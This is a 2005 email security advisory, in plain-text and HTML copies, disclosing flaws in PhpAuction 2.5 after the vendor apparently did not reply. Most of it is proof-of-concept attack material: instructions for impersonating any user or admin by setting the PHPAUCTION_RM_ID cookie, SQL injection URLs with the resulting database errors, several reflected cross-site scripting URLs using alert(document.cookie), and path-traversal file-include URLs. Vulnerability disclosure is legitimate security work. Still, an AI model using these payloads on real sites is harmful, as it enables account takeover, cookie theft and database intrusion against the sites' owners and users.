phpAuctionMulti.txt

`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0009_01C58325.6436F8C0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
  
-------------------------------------------------------------------------=  
-------  
  
Dcrab 's Security Advisory  
http://www.dbtech.org  
Deadbolt Computer Technologies  
  
******************************  
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU =  
CAN SEND EMAILS TO [email protected]  
******************************  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =  
or even code them. Learn more at http://www.dbtech.org  
  
Severity: High  
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql =  
injection, Cross Site Scripting and File Include vulnerabilities  
Date: 8/07/2005  
  
Vendor: PhpAuction  
Vendor Website: http://www.phpauction.org  
Vendor Status: Contacted but no reply  
Summary: There are, Authentication Bypass, Multiple Sql injection, Cross =  
Site Scripting and File Include vulnerabilities in PhpAuction.  
  
  
Proof of Concept Exploits:=20  
  
Authentication bypass  
Set the cookie as follows,  
Name: PHPAUCTION_RM_ID  
VALUE: Id number of the user/admin you want to impersinate (you can get =  
it from thier profile)  
Access the website, and you'r instantly logged in as them ;)  
  
/phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3Don&category=  
=3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&payment%5B%5D=3Don&payment%5B=  
%5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&seller=3D1&country=3DAfgha=  
nistan&ending=3D1&SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20=  
%3E%3E  
  
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL =  
result resource in =  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad=  
search.php on line 33  
  
/viewnews.php?id=3D'SQL_INJECTION  
Error: select * from PROSITE_news where id=3D\'SQL_INJECTION  
You have an error in your SQL syntax. Check the manual that corresponds =  
to your MySQL server version for the right syntax to use near =  
'\'SQL_INJECTION' at line 1  
  
/phpauction-gpl-2.5/index.php?lan=3D<script>alert(document.cookie)</scrip=  
t>  
Cross Site Scripting  
  
/phpauction-gpl-2.5/profile.php?user_id=3D158&auction_id=3D<script>alert(=  
document.cookie)</script>  
Cross Site Scripting  
  
/phpauction-gpl-2.5/profile.php?auction_id=3D<script>alert(document.cooki=  
e)</script>&id=3D159  
Cross Site Scripting  
  
/phpauction-gpl-2.5/admin/index.php?lan=3D<script>alert(document.cookie)<=  
/script>  
Cross Site Scripting  
  
/login.php?username=3D<script>alert(document.cookie)</script>  
Cross Site Scripting  
  
/viewnews.php?id=3D<script>alert(document.cookie)</script>  
Cross Site Scripting  
  
/phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here  
  
Warning: =  
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=  
ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: =  
No such file or directory in =  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php on line 34  
  
Fatal error: main(): Failed opening required =  
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=  
es.../put/.inc.php/file/name/here.inc.php' =  
(include_path=3D'.:/usr/local/lib/php') in =  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php on line 34  
  
  
/phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/name/here  
  
Warning: =  
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=  
ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: =  
No such file or directory in =  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php on line 34  
  
Fatal error: main(): Failed opening required =  
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=  
es.../put/.inc.php/file/name/here.inc.php' =  
(include_path=3D'.:/usr/local/lib/php') in =  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php on line 34  
  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =  
and at http://www.hackerscenter.com  
  
Author:=20  
These vulnerabilities have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =  
soon to come out book on Secure coding with php.  
  
  
  
Sincerely,=20  
Diabolic Crab=20  
  
  
  
------=_NextPart_000_0009_01C58325.6436F8C0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV>  
<HR>  
</DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =  
Computer=20  
Technologies</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial =  
size=3D2>******************************<BR>SPECIAL BIRTHDAY=20  
RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO =  
<A=20  
href=3D"mailto:[email protected]">[email protected]</A><BR>**=  
****************************</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc or even code them. Learn more at <A=20  
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: [Bday Release] =  
PhpAuction=20  
has Authentication Bypass, Multiple Sql injection, Cross Site Scripting =  
and File=20  
Include vulnerabilities<BR>Date: 8/07/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: PhpAuction<BR>Vendor Website: =  
<A=20  
href=3D"http://www.phpauction.org">http://www.phpauction.org</A><BR>Vendo=  
r Status:=20  
Contacted but no reply<BR>Summary: There are, Authentication Bypass, =  
Multiple=20  
Sql injection, Cross Site Scripting and File Include vulnerabilities in=20  
PhpAuction.</FONT></DIV>  
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>  
<DIV><BR>Proof of Concept Exploits: </DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Authentication bypass<BR>Set the cookie as follows,<BR>Name:=20  
PHPAUCTION_RM_ID<BR>VALUE: Id number of the user/admin you want to =  
impersinate=20  
(you can get it from thier profile)<BR>Access the website, and you'r =  
instantly=20  
logged in as them ;)</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3D=  
on&category=3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&pa=  
yment%5B%5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&paymen=  
t%5B%5D=3Don&seller=3D1&country=3DAfghanistan&ending=3D1&=  
SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20%3E%3E=  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Warning: mysql_fetch_assoc(): supplied argument is not a valid =  
MySQL result=20  
resource in=20  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad=  
search.php=20  
on line 33</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/viewnews.php?id=3D'SQL_INJECTION<BR>Error: select * from =  
PROSITE_news where=20  
id=3D\'SQL_INJECTION<BR>You have an error in your SQL syntax. Check the =  
manual=20  
that corresponds to your MySQL server version for the right syntax to =  
use near=20  
'\'SQL_INJECTION' at line 1</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/index.php?lan=3D<script>alert(document.coo=  
kie)</script><BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/profile.php?user_id=3D158&auction_id=3D<s=  
cript>alert(document.cookie)</script><BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/profile.php?auction_id=3D<script>alert(doc=  
ument.cookie)</script>&id=3D159<BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/admin/index.php?lan=3D<script>alert(docume=  
nt.cookie)</script><BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/login.php?username=3D<script>alert(document.cookie)</scrip=  
t><BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/viewnews.php?id=3D<script>alert(document.cookie)</script&g=  
t;<BR>Cross=20  
Site Scripting</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here</=  
DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Warning:=20  
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=  
ssages.../put/.inc.php/file/name/here.inc.php):=20  
failed to open stream: No such file or directory in=20  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php=20  
on line 34</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Fatal error: main(): Failed opening required=20  
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=  
es.../put/.inc.php/file/name/here.inc.php'=20  
(include_path=3D'.:/usr/local/lib/php') in=20  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php=20  
on line 34</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>/phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/n=  
ame/here</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Warning:=20  
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=  
ssages.../put/.inc.php/file/name/here.inc.php):=20  
failed to open stream: No such file or directory in=20  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php=20  
on line 34</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Fatal error: main(): Failed opening required=20  
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=  
es.../put/.inc.php/file/name/here.inc.php'=20  
(include_path=3D'.:/usr/local/lib/php') in=20  
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=  
cludes/messages.inc.php=20  
on line 34</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A> and=20  
at <A =  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=  
IV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilities have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =  
my soon to=20  
come out book on Secure coding with php.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV></FONT>&nbsp;</DIV>  
<DIV><BR>Sincerely, <BR>Diabolic Crab <BR><BR><BR></DIV></BODY></HTML>  
  
------=_NextPart_000_0009_01C58325.6436F8C0--  
`